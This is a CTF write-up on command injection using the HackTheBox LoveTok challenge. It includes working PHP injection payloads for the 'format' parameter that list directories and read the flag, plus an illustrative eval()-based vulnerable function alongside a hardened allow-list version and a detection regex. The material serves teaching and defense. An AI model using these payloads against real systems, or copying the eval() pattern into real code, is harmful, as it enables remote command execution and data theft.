We briefly explained command injection as one of the top 10 web application vulnerabilities. Command injection allows an attacker to execute system commands directly from the web browser because of missing input validation checks on the backend or web server side. We used the HackTheBox LoveTok challenge to demonstrate this subject in full.
True love is tough, and even harder to find. Once the sun has set, the lights close and the bell has rung… you find yourself licking your wounds and contemplating human existence. You wish to have somebody important in your life to share the experiences that come with it, the good and the bad. This is why we made LoveTok, the brand new service that accurately predicts in the threshold of milliseconds when love will come knockin’ (at your door). Come and check it out, but don’t try to cheat love because love cheats back. 💛
Video Highlights
In command injection, the attacker-injected code is executed by the underlying OS, allowing the attacker to run system commands to discover sensitive files, navigate the directory structure, create files and, of course, plant reverse shells and backdoors. In verbose command injection, the command output is returned to the user, which makes it possible to determine whether the system is vulnerable to command injection.
In the challenge, we inject into the “format” parameter of the URL below
http://IP:PORT/?format=r
We used the following payload as the value of the format parameter to achieve command injection
${system($_GET[cmd])}&cmd=ls /
To retrieve the flag, use
${system($_GET[cmd])}&cmd=cat /flagname
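The payload above only works because the server turns the format parameter into PHP source code. The PHP below is an added illustration written for this write-up, not the LoveTok challenge's own source: the vulnerable function assumes the backend builds a date() call inside a double-quoted string and hands it to eval(), which is why `${...}` interpolation runs system() even though addslashes() stops the attacker from closing the quote. The hardened function, the ALLOWED_FORMATS table and looksLikeCodeInjection() are constructed for this example; the payload string is the one shown in the write-up.

```php
<?php
// Added example (not the challenge's code): rendering a date from a
// user-supplied "format" parameter, vulnerable and hardened side by side.
declare(strict_types=1);

// VULNERABLE (assumed pattern): user-controlled text becomes PHP source.
// addslashes() prevents closing the quote, but inside a double-quoted
// string PHP still expands ${expr}, so ${system($_GET[cmd])} executes.
function renderTimeVulnerable(string $format): string
{
    $safe = addslashes($format);
    eval('$time = date("' . $safe . '", strtotime("+1 day"));');
    return $time ?? 'Something went wrong';
}

// HARDENED: no eval() at all, and the client may only pick a key from a
// fixed allow-list; the actual format strings are server-side literals.
const ALLOWED_FORMATS = [
    'r'     => 'r',                       // RFC 2822, the challenge's default
    'iso'   => 'Y-m-d\TH:i:sP',           // ISO 8601
    'human' => 'l, jS F Y \a\t g:ia',     // e.g. "Monday, 1st May 2023 at 9:05am"
];

function renderTimeHardened(string $formatKey): string
{
    if (!array_key_exists($formatKey, ALLOWED_FORMATS)) {
        return 'Unsupported format';      // reject, never interpret
    }
    return date(ALLOWED_FORMATS[$formatKey], strtotime('+1 day'));
}

// Detection aid: flag a parameter value that looks like PHP rather than a
// date format (variable interpolation, superglobals, command functions).
function looksLikeCodeInjection(string $value): bool
{
    $pattern = '/\$\{|\$_(GET|POST|REQUEST)\b|\b(system|exec|shell_exec|passthru)\s*\(/i';
    return (bool) preg_match($pattern, $value);
}

// Constructed inputs for a CLI self-check: php this_file.php
$benign  = 'r';
$payload = '${system($_GET[cmd])}';       // payload from the write-up

var_dump(looksLikeCodeInjection($benign));  // bool(false)
var_dump(looksLikeCodeInjection($payload)); // bool(true)
echo renderTimeVulnerable($benign), PHP_EOL; // harmless RFC 2822 date
echo renderTimeHardened('iso'), PHP_EOL;     // ISO 8601 date
echo renderTimeHardened($payload), PHP_EOL;  // "Unsupported format"
```

The self-check deliberately calls the vulnerable function only with a benign format; the point of the hardened version is that the request can no longer choose anything other than an index into a server-side table, so there is no string for eval() to interpret. The regex is a detection aid for access-log or WAF review of the "format" parameter, not a substitute for removing eval().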
Video Walkthrough